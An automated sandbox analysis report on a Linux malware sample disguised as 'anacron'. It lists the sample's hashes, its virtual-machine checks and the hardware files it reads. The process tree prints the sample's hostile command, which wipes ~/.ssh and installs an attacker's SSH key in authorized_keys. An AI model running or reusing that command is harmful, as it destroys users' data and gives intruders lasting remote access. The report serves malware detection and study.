7a7bfa4f84e073d45b33ca6d4e5f263d31aa512d124bc6c682029f2b831c7c08

Analysis

max time kernel
149s
max time network
150s
platform
ubuntu-22.04_amd64
resource
ubuntu2204-amd64-20240522.1-en
resource tags

arch:amd64arch:i386image:ubuntu2204-amd64-20240522.1-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
submitted
28-06-2024 12:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.rsync/a/anacron
Size

2.8MB
MD5

8d5d71c56b1f807edac5ac734feab41a
SHA1

ca2064303d74f5fec98d717f35cd8ee20e81b722
SHA256

49da718733de850ddd7e871fee1d2f041508d28b9cfc58a822786151004a9c2c
SHA512

514337791f6c2b71e9303899a6206f92eb905c780729008f3f754f256811332caa5d608662272a6eb3b1f3cf70d1ec528509bbe3f68c7960fc9df63c463fce3f
SSDEEP

49152:m7rTifP8qyUnJ1jIYuOwxC7mQ595+T91hGtZ1:Irm38qyUnJ1jgx0B5evhG

Score

6^/10

antivm

Malware Config

Signatures

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

Processes:

anacron

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	anacron
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	anacron
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	anacron
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	anacron

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

Processes:

anacron

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	anacron
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	anacron
File opened for reading	/sys/devices/virtual/dmi/id/board_version	anacron
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	anacron
File opened for reading	/sys/devices/virtual/dmi/id/product_version	anacron
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	anacron
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	anacron
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	anacron
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	anacron
File opened for reading	/sys/devices/virtual/dmi/id/board_name	anacron
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	anacron
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	anacron
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	anacron
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	anacron

Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

Virtualization/Sandbox Evasion
T1497

Processes:

anacron

description ioc process

File opened for reading /proc/cpuinfo anacron
Reads CPU attributes 1 TTPs 2 IoCs

System Information Discovery
T1082

Processes:

anacron

description ioc process

File opened for reading /sys/devices/system/cpu/online anacron
File opened for reading /sys/devices/system/cpu/possible anacron

description	ioc	process
File opened for reading	/proc/cpuinfo	anacron

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	anacron
File opened for reading	/sys/devices/system/cpu/possible	anacron

Enumerates kernel/hardware configuration 1 TTPs 50 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

anacron

description	ioc	process
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	anacron
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	anacron
File opened for reading	/sys/bus/cpu/devices	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	anacron
File opened for reading	/sys/bus/dax/devices	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	anacron
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	anacron
File opened for reading	/sys/bus/node/devices/node0/hugepages	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	anacron
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	anacron
File opened for reading	/sys/devices/virtual/dmi/id	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	anacron
File opened for reading	/sys/bus/node/devices/node0/cpumap	anacron
File opened for reading	/sys/bus/dax/target_node	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	anacron
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	anacron
File opened for reading	/sys/bus/dax/devices/target_node	anacron
File opened for reading	/sys/kernel/mm/hugepages	anacron
File opened for reading	/sys/devices/system/node/online	anacron
File opened for reading	/sys/bus/node/devices/node0/meminfo	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	anacron
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	anacron

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

Processes:

anacron

description	ioc	process
File opened for reading	/proc/mounts	anacron
File opened for reading	/proc/meminfo	anacron
File opened for reading	/proc/driver/nvidia/gpus	anacron
File opened for reading	/proc/elog	anacron

/tmp/.rsync/a/anacron
/tmp/.rsync/a/anacron
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1574

/bin/sh
sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
2⤵
PID:1575

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads